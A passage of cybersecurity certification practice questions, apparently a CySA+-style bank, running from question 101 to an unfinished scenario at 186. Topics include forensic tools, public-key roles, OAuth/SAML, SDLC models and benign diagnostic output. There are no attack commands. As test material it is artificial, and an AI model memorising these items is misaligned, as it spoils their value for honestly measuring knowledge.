C. Partial, Risk Informed, Managed, Adaptive
D. Partial, Managed, Risk Informed, Adaptive
101. Warren is working with a law enforcement agency on a digital forensic investigation and
needs to perform a forensic analysis of a phone obtained from a suspect. Which one of the
following tools is specifically designed for mobile forensics?

A. FTK
B. EnCase
C. Cellebrite
D. Helix

102. Carol is the cybersecurity representative to a software development project. During the
project kickoff meeting, the project manager used the figure shown here to illustrate their
approach to development and invited Carol to contribute security requirements at each
prototyping phase. Which software development methodology is this team using?

[Figure: a series of prototypes labeled Prototype I, Prototype II, ..., Prototype X. Each
prototype consists of the same sequence of stages: Business Modeling, Data Modeling, Process
Modeling, Application Generation, and Testing and Turnover.]

A. RAD
B. Waterfall
C. Agile
D. Spiral

103. Which one of the following requirements is often imposed by organizations as a way to
achieve their original control objective when they approve an exception to a security policy?

A. Documentation of scope
B. Limited duration
C. Compensating control
D. Business justification
104. Crystal is a security analyst for a company that hosts several web applications. She would
like to identify a tool that runs within her browser and allows her to interactively modify
session values during a live session. Which one of the following tools best meets Crystal's
requirements?

A. Tamper Data
B. Acunetix
C. ZAP
D. Burp


105. Berta is reviewing the security procedures surrounding the use of a cloud-based online
payment service by her company. She set the access permissions for this service so that the
same person cannot add funds to the account and transfer funds out of the account. What
security principle is most closely related to Berta's action?

A. Least privilege
B. Security through obscurity
C. Separation of duties
D. Dual control

106. Kaela's organization recently suffered a ransomware attack that was initiated through a
phishing message. She does have a content filtering system in place designed to prevent
users from accessing malicious websites. Which one of the following additional controls
would be most effective at preventing these attacks from succeeding?

A. Training
B. Intrusion detection system with threat intelligence
C. Application blacklisting
D. Social engineering

107. Terrence remotely connected to a Linux system and is attempting to determine the active
network connections on that system. What command can he use to most easily discover
this information?

A. ifconfig
B. tcpdump
C. iptables
D. ipconfig

108. Kieran is evaluating forensic tools and would like to consider the use of an open source
forensic suite. Which one of the following toolkits would best meet his needs?

A. FTK
B. EnCase
C. SIFT
D. Helix
109. Consider the LDAP directory hierarchy shown here. Two of the component names have
been blacked out. What is the appropriate abbreviation for the node types that have been
blacked out?

[Figure: LDAP directory tree whose root is dc = example, dc = com; the type labels of two
child nodes have been blacked out.]

A. ad
B. cn
C. dc
D. ou


Questions 110-114 refer to the following scenario:

Alice and Bob are both employees at the same company. They currently participate in an
asymmetric cryptosystem and would like to use that system to communicate with each
other securely.

110. Alice would like to send an encrypted message to Bob. What key should she use to encrypt
the message?

A. Alice's public key
B. Alice's private key
C. Bob's public key
D. Bob's private key

111. When Bob receives the message from Alice, what key should he use to decrypt it?

A. Alice's public key
B. Alice's private key
C. Bob's public key
D. Bob's private key

112. Before sending the message, Alice would like to apply a digital signature to it. What key
should she use to create the digital signature?

A. Alice's public key
B. Alice's private key
C. Bob's public key
D. Bob's private key

113. When Bob receives the message, what key can he use to verify the digital signature?

A. Alice's public key
B. Alice's private key
C. Bob's public key
D. Bob's private key

114. If Alice applies a digital signature to the message, what cryptographic goal is she
attempting to achieve?

A. Confidentiality
B. Accountability
C. Availability
D. Nonrepudiation

115. Sam recently installed a new security appliance on his network as part of a managed
service deployment. The vendor controls the appliance, and Sam is not able to log into it or
configure it. Sam is concerned about whether the appliance receives necessary security
updates for the underlying operating system. Which one of the following would serve as
the best control that Sam can implement to alleviate his concern?

A. Configuration management
B. Vulnerability scanning
C. Intrusion prevention
D. Automatic updates
116. Val receives reports that users cannot access the CompTIA website from her network. She
runs the ping command against the site and sees the results shown here. What conclusion
can Val reach?

laptop:~: ping www.comptia.org
PING www.comptia.org (198.134.5.6): 56 data bytes
64 bytes from 198.134.5.6: icmp_seq=0 ttl=50 time=17.161 ms
64 bytes from 198.134.5.6: icmp_seq=1 ttl=50 time=17.550 ms
64 bytes from 198.134.5.6: icmp_seq=2 ttl=50 time=16.852 ms
64 bytes from 198.134.5.6: icmp_seq=3 ttl=50 time=16.999 ms
64 bytes from 198.134.5.6: icmp_seq=4 ttl=50 time=17.571 ms
64 bytes from 198.134.5.6: icmp_seq=5 ttl=50 time=17.980 ms
64 bytes from 198.134.5.6: icmp_seq=6 ttl=50 time=17.510 ms
64 bytes from 198.134.5.6: icmp_seq=7 ttl=50 time=17.532 ms
64 bytes from 198.134.5.6: icmp_seq=8 ttl=50 time=17.602 ms
64 bytes from 198.134.5.6: icmp_seq=9 ttl=50 time=17.541 ms
64 bytes from 198.134.5.6: icmp_seq=10 ttl=50 time=16.842 ms

A. The network is working properly, but the website is down.
B. The network path between her system and the website is functioning properly.
C. There is excessive network latency that may be causing the issue.
D. There is excessive packet loss that may be causing the issue.

117. The following diagram shows the high-level design of a federated identity management
system. The name of the entity that participates in steps 1 and 4 has been blacked out.
What is the proper name for this entity?

[Figure: federated identity flow between a Consumer, an Identity Provider (IDP), and a
blacked-out entity that trusts the IDP. 1. Consumer requests access from the blacked-out
entity. 2. Consumer is redirected to the IDP, and their identity is validated. 3. IDP provides
token to consumer. 4. The blacked-out entity accepts tokens and allows use of the service.]

A. Federation manager
B. Service provider
C. Ticket granting server
D. Domain controller


118. Thomas found himself in the middle of a dispute between two different units in his
business that are arguing over whether one unit may analyze data collected by the other. What
type of policy would most likely contain guidance on this issue?

A. Data ownership policy
B. Data classification policy
C. Data retention policy
D. Account management policy

119. Rose is considering deploying the Microsoft Enhanced Mitigation Experience Toolkit
(EMET) to secure systems in her organization. She would specifically like to use the tool
to prevent buffer overflow attacks that rely upon knowledge of specific memory locations
used by applications. Which EMET feature would best meet Rose's needs?

A. DLP
B. ASLR
C. EMEA
D. DEP


120. Greg recently logged into a web application used by his organization. After entering his
password, he was required to input a code from the app shown here. What type of
authentication factor is this app providing?

[Figure: phone screenshot of the Google Authenticator app (status bar reads "No Service")
showing the six-digit code 924233 for the account csaplus16@gmail.com.]

A. Something you know
B. Something you have
C. Something you are
D. Somewhere you are


121. Which software development methodology is shown here?

[Figure: a sequence of sprints labeled Sprint 1, Sprint 2, ..., Sprint X. Each sprint is a
cycle of Sprint Planning, Development, Testing, and Demonstration.]

A. Waterfall
B. Spiral
C. Agile
D. RAD


122. Ian is reviewing the security architecture shown here. This architecture is designed to
connect his local data center with an IaaS service provider that his company is using
to provide overflow services. What component can be used at the points marked by ?s to
provide a secure encrypted network connection?

[Figure: on the left, the Local Data Center with an Internal Network hosting Physical and
Virtual Servers and Internal Database Servers; on the right, the IaaS Service Provider Network
hosting Virtual Servers and Databases. The two networks are joined by a link whose endpoints
are marked with question marks.]

A. Firewall
B. VPN
C. IPS
D. DLP


123. Which one of the following tools is not typically used to gather evidence in a forensic
investigation?

A. FTK
B. EnCase
C. Helix
D. Burp

124. Renee is investigating a cybersecurity breach that took place on one of her organization's
Linux servers. As she analyzed the server log files, she determined that the attacker gained
access to an account belonging to an administrative assistant. After interviewing the assistant,
Renee determined that the account was compromised through a social engineering attack. The
log files also show that the user entered a few unusual-looking commands and then began
issuing administrative commands to the server. What type of attack most likely took place?

A. Man-in-the-middle
B. Buffer overflow
C. Privilege escalation
D. LDAP injection

125. Joan is working as a security consultant to a company that runs a critical web
application. She discovered that the application has a serious SQL injection vulnerability, but the
company cannot take the system offline during the two weeks required to revise the code.
Which one of the following technologies would serve as the best compensating control?

A. IPS
B. WAF
C. Vulnerability scanning
D. Encryption


126. Which one of the following testing techniques is typically the final testing done before
code is released to production?

A. Unit testing
B. Integration testing
C. User acceptance testing
D. Security testing

127. Carla is designing a new data mining system that will analyze access control logs for signs
of unusual login attempts. Any suspicious logins will be automatically locked out of the
system. What type of control is Carla designing?

A. Physical control
B. Logical control
C. Administrative control
D. Compensating control


128. Sam recently conducted a test of a web application using the tool shown here. What type
of testing did Sam perform?

[Figure: screenshot titled "Untitled Session - 20160109-122051 - OWASP ZAP 2.4.3" in
Standard Mode. The site tree on the left lists requests to en.wikipedia.org, including
GET:sitemap and GET:robots.txt. The response pane shows an HTTP/1.1 200 OK from
Server: nginx/1.9.4 (Content-Type: text/html; charset=UTF-8) whose body is the MediaWiki
API's HTML rendering of a JSON error, "Unrecognized value for parameter action". The
bottom panel is the Fuzzer tab: "New Fuzz", Progress 100%, Current fuzzers: 0,
Messages Sent: 11, Errors: 0, with result rows marked "Reflected".]

A. Static analysis
B. Fuzzing
C. Vulnerability scanning
D. Peer review
129. Which one of the following technologies is not typically used to implement network
segmentation?

A. Host firewall
B. Network firewall
C. VLAN tagging
D. Routers and switches

Questions 130-133 refer to the following scenario:

Maddox ran a traceroute command to determine the network path between his system
and the Amazon.com web server. He received the partial results shown here:

traceroute to d3ag4hukkh62yn.cloudfront.net (52.84.61.25), 64 hops max, 52 byte packets
 1  192.168.1.1 (192.168.1.1)  1.277 ms  0.826 ms  0.831 ms
 2  10.179.160.1 (10.179.160.1)  15.040 ms  11.744 ms  11.822 ms
 3  172.30.35.33 (172.30.35.33)  21.534 ms  18.069 ms  17.193 ms
 4  68-66-73-118.client.mchsi.com (68.66.73.118)  18.075 ms  19.740 ms  19.949 ms
 5  68-66-73-122.client.mchsi.com (68.66.73.122)  30.204 ms  19.967 ms  25.860 ms
 6  52.95.217.136 (52.95.217.136)  19.344 ms  19.719 ms  29.578 ms
 7  52.95.62.84 (52.95.62.84)  20.400 ms
    52.95.62.36 (52.95.62.36)  26.577 ms  18.650 ms
 8  52.95.62.111 (52.95.62.111)  22.613 ms
    52.95.62.63 (52.95.62.63)  20.346 ms
    52.95.62.125 (52.95.62.125)  19.759 ms
 9  54.239.42.59 (54.239.42.59)  20.141 ms
    54.239.43.211 (54.239.43.211)  32.133 ms
    54.239.42.59 (54.239.42.59)  19.903 ms
10  52.95.63.193 (52.95.63.193)  22.677 ms
    52.95.63.195 (52.95.63.195)  18.146 ms  19.960 ms
11  * * *
12  * * *
13  * * *

130. What is the IP address of the server hosting the Amazon.com website?

A. 192.168.1.1
B. 52.84.61.25
C. 52.95.63.195
D. 68.66.73.118

131. What is the IP address of Maddox's default gateway?

A. 192.168.1.1
B. 10.179.1.1
C. 172.30.35.33
D. 10.179.160.1

132. What is the first IP address on the public Internet that this traffic is passing through?

A. 192.168.1.1
B. 172.30.35.33
C. 52.95.63.195
D. 68.66.73.118

133. How can Maddox interpret the asterisk results that appear beginning with line 11 of the
traceroute results?

A. They are normal results of performing a traceroute.
B. The network is down.
C. Someone is intercepting his network traffic.
D. The web server is down.


134. Which one of the following elements is least likely to be found in a data retention policy?

A. Minimum retention period for data
B. Maximum retention period for data
C. Description of information to retain
D. Classification of information elements


135. Bob remotely connected to a Windows server and would like to determine the server's
function. He ran the TCPView tool from the Sysinternals suite on that server and saw the
results shown here. What role best describes this server?

[Figure: TCPView (Sysinternals: www.sysinternals.com) window listing endpoints by Process,
Protocol, Local Address, Local Port, Remote Address, Remote Port and State. The rows include
lsass.exe, msmdsrv.exe (listening on port 2383), services.exe, spoolsv.exe, sqlservr.exe
(listening on TCP and TCPV6 ports 1433 and 1434), many svchost.exe instances (ports such as
135, 3389, 123, 1900, 5353 and 5355) and System (ports such as 139, 80, 445, 5985, 47001, 137
and 138). Local addresses are 0.0.0.0, 127.0.0.1, 172.31.57.167 or their IPv6 equivalents;
one ESTABLISHED TCP connection on local port 3389 has remote address 50.207.18.2. The
status bar reads: Established: 3, Listening: 31, Time Wait: 4, Close Wait: 0.]

A. Web server
B. File server
C. Database server
D. Logging server

136. Which forensic imaging tool is already installed on most Linux operating systems?

A. FTK
B. OSFClone
C. EnCase
D. dd


137. Bobbi is deploying a single system that will be used to manage a sensitive industrial control process. This system will operate in a stand-alone fashion and not have any connection to other networks. What strategy is Bobbi deploying to protect this SCADA system?
A. Network segmentation
B. VLAN isolation
C. Air gapping
D. Logical isolation

138. Which software development methodology is illustrated here?

[Figure: diagram of a development process with phases labeled Gather Requirements, Implement, and Test / Validate]

A. Spiral
B. RAD
C. Agile
D. Waterfall

139. Charles is assessing the security of his organization’s RADIUS server. Which one of the following security controls could Charles use to best mitigate the security vulnerabilities inherent in the RADIUS authentication protocol?
A. Hashing of stored passwords
B. Encryption of stored passwords
C. Encryption of network traffic
D. Replacement of TCP with UDP

140. Which of the following parties directly communicates with the end user during a SAML transaction?
A. Relying party
B. SAML identity provider
C. Both the relying party and the SAML identity provider
D. Neither the relying party nor the SAML identity provider

141. In a federated identity management system, what entity is responsible for creating an authentication token?
A. Identity provider
B. Service provider
C. Federation coordinator
D. Endpoint device

142. Ty is troubleshooting a security issue with a website maintained by his organization. Users are seeing the error message shown here. What can Ty do to remediate this issue?

[Figure: browser certificate viewer, Details tab]
Could not verify this certificate because the issuer is unknown.

Issued To
Common Name (CN)            *.badssl.com
Organization (O)            BadSSL
Organizational Unit (OU)    <Not Part Of Certificate>
Serial Number               00:86:FB:4D:C8:E5:DD:0F:18

Issued By
Common Name (CN)            *.badssl.com
Organization (O)            BadSSL
Organizational Unit (OU)    <Not Part Of Certificate>

Period of Validity
Begins On                   August 8, 2016
Expires On                  August 8, 2018

Fingerprints
SHA-256 Fingerprint         28:C9:E8:BA:A6:03:EE:94:00:2E:CA:CD:37:C1:50:91:DC:A6:E1:AC:8E:D4:29:E3:11:89:7C:6C:72:20:34:B0
SHA-1 Fingerprint           64:14:50:D9:4A:65:FA:EB:3B:63:10:28:D8:E8:6C:95:43:1D:B8:11

A. Use a different CA
B. Renew the certificate
C. Upgrade the cipher strength
D. Patch the operating system

143. Richard would like to deploy a web application firewall in front of a vulnerable web application. Which one of the following products is least likely to meet his needs?
A. CloudFlare
B. FortiWeb
C. NAXSI
D. FTK

144. In the ITIL service life cycle shown here, what core activity is represented by the X?

[Figure: ITIL service life cycle diagram; one of the core activities is labeled X]

A. Continual service improvement
B. Service design
C. Service operation
D. Service transition

145. Ted is preparing an RFP for a vendor to supply network firewalls to his organization. Which one of the following vendors is least likely to meet his requirements?
A. CheckPoint
B. Palo Alto
C. FireEye
D. Juniper

146. Which one of the following approaches is an example of a formal code review process?
A. Pair programming
B. Over-the-shoulder
C. Fagan inspection
D. Pass-around code review

147. Randy’s organization recently adopted a new testing methodology that they find is very compatible with their agile approach to software development. In this model, one developer writes code, while a second developer reviews their code as they write it. What approach are they using?
A. Pair programming
B. Over-the-shoulder review
C. Pass-around code reviews
D. Tool-assisted reviews

148. Julie is refreshing her organization’s cybersecurity program using the NIST Cybersecurity Framework. She would like to use a template that describes how a specific organization might approach cybersecurity matters. What element of the NIST Cybersecurity Framework would best meet Julie’s needs?
A. Framework Scenarios
B. Framework Core
C. Framework Implementation Tiers
D. Framework Profiles

149. Mike is troubleshooting an issue on his Mac and believes that he may have a defective network interface. He uses the ifconfig command to determine details about the interface and receives the results shown here. Which network interface appears to have an active connection to a network?

Mikes-Mac-mini:~ mchapple$ ifconfig
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384
        options=1203<RXCSUM,TXCSUM,TXSTATUS,SW_TIMESTAMP>
        inet 127.0.0.1 netmask 0xff000000
        inet6 ::1 prefixlen 128
        inet6 fe80::1%lo0 prefixlen 64 scopeid 0x1
        nd6 options=201<PERFORMNUD,DAD>
gif0: flags=8010<POINTOPOINT,MULTICAST> mtu 1280
stf0: flags=0<> mtu 1280
en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
        options=10b<RXCSUM,TXCSUM,VLAN_HWTAGGING,AV>
        ether 98:5a:eb:cf:5d:21
        nd6 options=201<PERFORMNUD,DAD>
        media: autoselect (none)
        status: inactive
en1: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
        ether 78:9f:70:7a:63:56
        inet6 fe80::c04:d54a:4a38:fab7%en1 prefixlen 64 secured scopeid 0x5
        inet 10.0.1.77 netmask 0xffffff00 broadcast 10.0.1.255
        inet6 2601:245:c101:54f6:1cf9:4aae:38a4:897 prefixlen 64 autoconf secured
        inet6 2601:245:c101:54f6:b0b3:d875:df5d:69b2 prefixlen 64 deprecated autoconf temporary
        inet6 2601:245:c101:54f6:9d2e:4a3b:3c03:8fb3 prefixlen 64 deprecated autoconf temporary
        inet6 2601:245:c101:54f6:91c4:2844:1c7:97d0 prefixlen 64 deprecated autoconf temporary
        inet6 2601:245:c101:54f6:46a:838f:27b2:b2e1 prefixlen 64 deprecated autoconf temporary
        inet6 2601:245:c101:54f6:f877:aa73:2726:daad prefixlen 64 autoconf temporary
        nd6 options=201<PERFORMNUD,DAD>
        media: autoselect
        status: active

A. lo0
B. gif0
C. en0
D. en1

150. Simon would like to use a cybersecurity analysis tool that facilitates searching through massive quantities of log information in a visual manner. He has a colleague who uses the tool shown here. What tool would best meet Simon’s needs?

[Figure: screen capture of a log search interface. Search bar: host=dynamo, time range All time; result banner: 101,817 events (before 1/7/17 2:35:30.000 PM), No Event Sampling, Smart Mode; tabs Events (101,817), Patterns, Statistics, Visualization; timeline with Format Timeline, Zoom Out, Zoom to Selection, Deselect, 1 day per column. Left pane, Selected Fields: host 1, source 3, sourcetype 3. Interesting Fields: Account_Domain 4, Account_Name 10, ComputerName 1, date_hour 24, date_mday 31, date_minute 60, date_month 4, date_second 60, date_wday 7, date_year 2, date_zone 1, Event_Source_ID 100+, EventCode 100+, EventType 5, index 1, Keywords 12, linecount 27, LogName 3, Logon_ID 33, Message 100+, OpCode 11, Process_ID 100+, Process_Name 16, punct 100+, RecordNumber 100+, Security_ID 11, Source_Name 1, SourceName 100+, splunk_server 1. Event list (List view, 20 Per Page) shows Time and Event columns with the following entries:]

1/7/17 2:28:31.000 PM
    01/07/2017 02:28:31 PM
    LogName=Application
    SourceName=MsiInstaller
    EventCode=1033
    EventType=4
    Show all 15 lines
    host = dynamo | source = WinEventLog:Application | sourcetype = WinEventLog:Application

1/7/17 2:28:31.000 PM
    01/07/2017 02:28:31 PM
    LogName=Application
    SourceName=MsiInstaller
    EventCode=11707
    EventType=4
    Show all 15 lines
    host = dynamo | source = WinEventLog:Application | sourcetype = WinEventLog:Application

1/7/17 2:28:20.000 PM
    01/07/2017 02:28:20 PM
    LogName=Application
    SourceName=MsiInstaller
    EventCode=1042
    EventType=4
    Show all 15 lines
    host = dynamo | source = WinEventLog:Application | sourcetype = WinEventLog:Application

1/7/17 2:27:50.000 PM
    01/07/2017 02:27:50 PM
    LogName=System
    SourceName=Microsoft-Windows-Service Control Manager
    EventCode=7040
    EventType=4
    Show all 15 lines
    host = dynamo | source = WinEventLog:System | sourcetype = WinEventLog:System

1/7/17 2:27:50.000 PM
    01/07/2017 02:27:50 PM
    LogName=System
    SourceName=Microsoft-Windows-Service Control Manager
    EventCode=7045
    EventType=4
    Show all 21 lines
    host = dynamo | source = WinEventLog:System | sourcetype = WinEventLog:System

1/7/17 2:27:48.000 PM
    01/07/2017 02:27:48 PM
    LogName=System
    SourceName=Microsoft-Windows-Service Control Manager
    EventCode=7045
    EventType=4
    Show all 21 lines
    host = dynamo | source = WinEventLog:System | sourcetype = WinEventLog:System

A. Syslog
B. Kiwi
C. Splunk
D. Sysinternals

151. Wanda’s organization uses the Acunetix tool for software testing. Which one of the following issues is Acunetix most likely to detect?
A. Cross-site scripting
B. Lexical scoping errors
C. Buffer overflows
D. Insecure data storage

152. Mike is analyzing network traffic using Wireshark and comes across the packet shown here. Which one of the following phrases best describes the purpose of this packet?

[Figure: Wireshark capture on the Wi-Fi interface. Packet list (time column shows only the fractional seconds):]

Time      Source           Destination      Protocol  Length  Info
.968053   216.58.192.202   10.36.19.226     TLSv1     535     Application Data
.968174   10.36.19.226     216.58.192.202   TCP       66      53517 → 443 [ACK] Seq=6938 Ack=6490 Win=130592 Len=0 TSval=414172842 TSecr=2508329797
.968198   216.58.192.202   10.36.19.226     TLSv1     999     Application Data
.968309   10.36.19.226     216.58.192.202   TCP       66      53517 → 443 [ACK] Seq=6938 Ack=7423 Win=130112 Len=0 TSval=414172842 TSecr=2508329797
.968332   216.58.192.202   10.36.19.226     TLSv1     103     Application Data
.128853   10.36.19.226     216.58.192.202   TCP       66      53517 → 443 [ACK] Seq=6938 Ack=7460 Win=130080 Len=0 TSval=414172842 TSecr=2508329797
          10.36.19.226     209.85.147.125   XMPP/...  540     UNKNOWN PACKET
.148361   10.36.19.226     66.205.160.99    DNS       79      Standard query 0x9c48 A clients4.google.com        (selected packet, frame 4767)
.149370   209.85.147.125   10.36.19.226     TCP       66      5222 → 50636 [ACK] Seq=2852 Ack=1516 Win=230 Len=0 TSval=845444413 TSecr=414173000
.149725   66.205.160.99    10.36.19.226     DNS       119     Standard query response 0x9c48 A clients4.google.com CNAME clients.l.google.com A 172.217.1.46
.150183   10.36.19.226     172.217.1.46     QUIC      368     Payload (Encrypted), ...: 186, CID: 9422862884960226725
.150252   10.36.19.226     172.217.1.46     QUIC      555     Payload (Encrypted), ...: 187, CID: 9422862884960226725
.162769   172.217.1.46     10.36.19.226     QUIC      89      Payload (Encrypted), ...: 18177
.175809   172.217.1.46     10.36.19.226     QUIC      263     Payload (Encrypted), ...: 18433
.176028   172.217.1.46     10.36.19.226     QUIC      59      Payload (Encrypted), ...: 18689
.176708   10.36.19.226     172.217.1.46     QUIC      84      Payload (Encrypted), ...: 188, CID: 9422862884960226725

[Packet details for the selected frame:]

Frame 4767: 79 bytes on wire (632 bits), 79 bytes captured (632 bits) on interface 0
Ethernet II, Src: Apple_87:8a:73 (98:e0:d9:87:8a:73), Dst: Cisco_8f:ec:00 (00:1f:c9:8f:ec:00)
Internet Protocol Version 4, Src: 10.36.19.226, Dst: 66.205.160.99
User Datagram Protocol, Src Port: 45069, Dst Port: 53
Domain Name System (query)
    [Response In: 4769]
    Transaction ID: 0x9c48
    Flags: 0x0100 Standard query
    Questions: 1
    Answer RRs: 0
    Authority RRs: 0
    Additional RRs: 0
    Queries
        clients4.google.com: type A, class IN
            Name: clients4.google.com
            [Name Length: 19]
            [Label Count: 3]
            Type: A (Host Address) (1)
            Class: IN (0x0001)

[Packet bytes:]

00 1f c9 8f ec 00 98 e0 d9 87 8a 73 08 00 45 00
00 41 e9 fa 00 00 40 11 8f 7b 0a 24 13 e2 42 cd
a0 63 b0 0d 00 35 00 2d 76 10 9c 48 01 00 00 01
00 00 00 00 00 00 08 63 6c 69 65 6e 74 73 34 06
67 6f 6f 67 6c 65 03 63 6f 6d 00 00 01 00 01

A. Requesting name resolution
B. Responding to a name resolution request
C. Requesting mail server access
D. Responding to a mail server access request

153. What type of organizations are required to adopt the ISO 27001 standard for cybersecurity?
A. Healthcare organizations
B. Financial services firms
C. Educational institutions
D. None of the above

154. Ursula is a security administrator for an organization that provides web services that participate in federated identity management using the OAuth framework. Her organization’s role is to operate the web service that users access once they have received authorization from their identity provider. Which type of OAuth component does Ursula’s group manage?
A. Clients
B. Resource owners
C. Resource servers
D. Authorization servers

155. Colin is looking for a solution that will help him aggregate the many different sources of security information created in his environment and correlate those records for relevant security issues. Which one of the following tools would assist Colin with this task?
A. DLP
B. SIEM
C. IPS
D. CRM

156. Which one of the following is not an example of a physical security control?
A. Network firewall
B. Door lock
C. Fire suppression system
D. Biometric door controller

157. Which of the following authentication factors did NIST recommend be deprecated in 2016?
A. Retina scans
B. Fingerprints
C. SMS
D. Application-generated tokens

158. The Open Web Application Security Project (OWASP) maintains an application called Orizon. This application reviews Java classes and identifies potential security flaws. What type of tool is Orizon?
A. Fuzzer
B. Static code analyzer
C. Web application assessor
D. Fault injector

159. During the design of an identity and access management authorization scheme, Katie took steps to ensure that members of the security team who can approve database access requests do not have access to the database themselves. What security principle is Katie most directly enforcing?
A. Least privilege
B. Separation of duties
C. Dual control
D. Security through obscurity

160. Which one of the following characters would not signal a potential security issue during the validation of user input to a web application?
A. <
B. '
C. >
D. $

161. Dave is a web application developer who is working in partnership with system engineers in a DevOps environment. He is concerned about the security of a web application he is deploying and would like a reference benchmark to help secure the web server that will be hosting his application. Which one of the following sources would best meet Dave’s needs?
A. OWASP
B. SANS
C. CIS
D. NSA

162. Which one of the following controls is useful to both facilitate the continuity of operations and serve as a deterrent to fraud?
A. Succession planning
B. Dual control
C. Cross-training
D. Separation of duties

163. Tom is concerned about the integrity of a file, so he runs the shasum utility on it. The following figure shows the results of running it on two separate days. What conclusion can Tom draw from these results?

[Figure: Terminal window]
Wed Sep 27: shasum < ridership.txt
e8caf4fce2fbb425294ce3c889a0f877ca18ea8f  -
Wed Sep 27:
Fri Sep 29: shasum < ridership.txt
e8caf4fce2fbb425294ce3c889a0f877ca18ea8f  -
Fri Sep 29:

A. The file experienced significant modification between Wednesday and Friday.
B. The file experienced minor modification between Wednesday and Friday.
C. The file verified on Friday is identical to the file from Wednesday.
D. Tom does not have enough information to draw any of these conclusions.

Questions 164-166 refer to the following scenario:

Maureen is designing an authentication system upgrade for her organization. The organization currently uses only password-based authentication and has been suffering a series of phishing attacks. Maureen is tasked with upgrading the company’s technology to better protect against this threat.

164. Maureen would like to achieve multifactor authentication. Which one of the following authentication techniques would be most appropriate?
A. PIN
B. Security questions
C. Smartcard
D. Password complexity

165. Which one of the following technologies is not suitable for Maureen to use as a second factor because of security issues with its implementation?
A. HOTP tokens
B. TOTP tokens
C. SMS messages
D. Soft tokens

166. Maureen would like to add technology that makes risk-based decisions about authentication complexity, requiring multifactor authentication in cases where the user’s login seems unusual. What technology is Maureen seeking to add?
A. Multifactor authentication
B. Context-based authentication
C. Dual authentication
D. Biometric authentication

167. Which one of the following security architectural views would provide details about the flow of information in a complex system?
A. Technical view
B. Logical view
C. Firewall view
D. Operational view

168. Jane is working in a PCI DSS-compliant environment and is attempting to secure a legacy payment application. The application does not allow for passwords longer than six characters, in violation of PCI DSS. Which one of the following would be a reasonable compensating control in this scenario?
A. Lock users out after six incorrect login attempts.
B. Limit logins to the physical console.
C. Require multifactor authentication.
D. Require the use of both alphabetic and numeric characters in passwords.

169. Gina’s organization recently retired their last site-to-site VPN connection because of lack of use. Gina consulted the policy repository and found that there is a standards document describing the requirements for site-to-site VPNs. How should Gina address this standard?
A. Leave it in place in case the organization decides to implement a site-to-site VPN in the future.
B. Retire the standard and archive it.
C. Update the standard with a note that there are no current deployments.
D. Place the standard on an annual review cycle.

170. Which one of the following test types typically involves an evaluation of the application by end users?
A. Stress testing
B. Fuzz testing
C. Acceptance testing
D. Regression testing

171. Carla is consulting with a website operator on an identity management solution. She would like to find an approach that leverages federated identity management and provides service authorization. Which one of the following technologies would be best suited for her needs?
A. OpenID
B. Active Directory
C. Kerberos
D. OAuth

172. Susan wants to provide authentication for APIs using an open standard. Which of the following protocols is best suited to her purposes if she intends to connect to existing cloud service provider partners?
A. RADIUS
B. SAML
C. OAuth
D. TACACS+

173. Haley is planning to deploy a security update to an application provided by a third-party vendor. She installed the patch in a test environment and would like to determine whether applying the patch creates other issues. What type of test can Haley run to best determine the impact of the change?
A. Regression testing
B. User acceptance testing
C. Stress testing
D. Vulnerability scanning

174. In a kaizen approach to continuous improvement, who bears responsibility for the improvement effort?
A. The manager most directly responsible for the process being improved
B. The team responsible for the process
C. The continuous improvement facilitator
D. The most senior executive in the organization

175. Nick is designing an authentication infrastructure and wants to run an authentication protocol over an insecure network without the use of additional encryption services. Which one of the following protocols is most appropriate for this situation?
A. RADIUS
B. TACACS
C. TACACS+
D. Kerberos

176. Helen is reviewing her organization’s network design, shown here. Which component shown in the diagram is a single point of failure for the organization?

[Figure: network diagram with components labeled Firewalls, Routers, Core Switches, Distribution Router, and Edge Switches]

A. Firewall
B. Upstream router
C. Core switch
D. Distribution router

177. Greg is designing a defense-in-depth approach to securing his organization’s information and would like to select cryptographic tools that are appropriate for different use cases and provide strong encryption. Which one of the following pairings is the best use of encryption tools?
A. SSL for data in motion and AES for data at rest
B. VPN for data in motion and SSL for data at rest
C. TLS for data in motion and AES for data at rest
D. SSL for data in motion and TLS for data at rest

178. Francine would like to assess the security of her organization’s wireless networks. Which one of the following network security tools would be best suited for this task?
A. Wireshark
B. tcpdump
C. nmap
D. aircrack-ng

179. Belinda is configuring an OpenLDAP server that will store passwords for her organization. Which one of the following password storage schemes will provide the highest level of security?
A. CRYPT
B. SSHA
C. MD5
D. SASL

180. Robin is planning to deploy a context-based authentication system for her organization. Which one of the following factors is not normally used as part of the authentication context?
A. Geolocation
B. User behavior
C. Time of day
D. Password complexity

181. Miguel works for a company that has a network security standard requiring the collection and storage of NetFlow logs from all data center networks. Miguel is working to commission a new data center network but, because of technical constraints, will be unable to collect NetFlow logs for the first six months of operation. Which one of the following data sources is best suited to serve as a compensating control for the lack of NetFlow information?
A. Router logs
B. Firewall logs
C. Switch logs
D. IPS logs

182. Which one of the following tools is the most widely used implementation of Transport Layer Security in use today?
A. OpenSSL
B. SecureSSL
C. SecureTLS
D. OpenTLS

183. Ken would like to configure an alarm to alert him whenever an event is recorded to syslog that has a critical severity level. What value should he use for the severity in his alert that corresponds to critical messages?
A. 0
B. 2
C. 5
D. 7

184. Ashley is working with software developers to evaluate the security of an application they are upgrading. She is performing testing that slightly modifies the application code to help identify errors in code segments that might be infrequently used. What type of testing is Ashley performing?
A. Stress testing
B. Fuzz testing
C. Fault injection
D. Mutation testing

185. Don is considering the deployment of a self-service password reset mechanism to reduce the burden on his organization’s help desk. The solution will provide password resets for the organization’s SSO system. He is concerned that attackers might use this mechanism to compromise user accounts. Which one of the following authentication approaches would best meet the business need while addressing Don’s security concerns?
A. Two-factor authentication combining a password and token
B. Passcode sent via SMS to a cell phone
C. Email link to a password reset web page
D. Security questions

186. Patrick is reviewing the contents of a compromised server and determines that an intruder installed a tool called John the Ripper. What is the purpose of this tool?
A. Stealing copyrighted media content
B. Cracking passwords
C. Monitoring network traffic
D. Launching DDoS attacks

Questions 187-190 refer to the following scenario:

Bill is reviewing the authentication logs for a Linux system that he operates and encounters the following log entries:

